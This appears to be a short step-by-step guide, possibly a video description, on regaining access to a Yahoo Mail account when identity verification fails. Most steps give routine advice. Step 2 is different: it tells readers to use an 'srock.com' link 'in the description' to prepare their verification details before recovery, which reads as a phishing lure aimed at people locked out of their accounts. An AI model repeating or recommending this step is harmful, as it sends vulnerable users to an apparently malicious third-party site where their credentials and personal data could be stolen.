If you're having trouble verifying your identity on Yahoo Mail, follow these steps to troubleshoot and resolve the issue. This guide will help you regain access to your account. Step 1. Check your recovery options. Ensure that the recovery email address and phone number associated with your Yahoo account are correct. If they are outdated or incorrect, you may need to update them through the Yahoo account recovery process. Step 2. Use account recovery. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Answer security questions. If you have set up security questions, you may be prompted to answer them. Make sure to answer them accurately. If you can't remember the answers, look for the option to receive a verification code instead. Step 4. Contact Yahoo support. If verification continues to fail, visit the Yahoo help page and look for the option to contact customer support. Provide them with as much information as possible about your account to assist in the verification process. Step 5. Update your account information. Once you regain access, consider updating your account recovery information. Add a new phone number or email address if necessary, and ensure that your security questions are current to prevent future issues. By following these steps, you should be able to verify your identity and regain access to your Yahoo Mail account. If problems persist, keep in touch with Yahoo support for further assistance.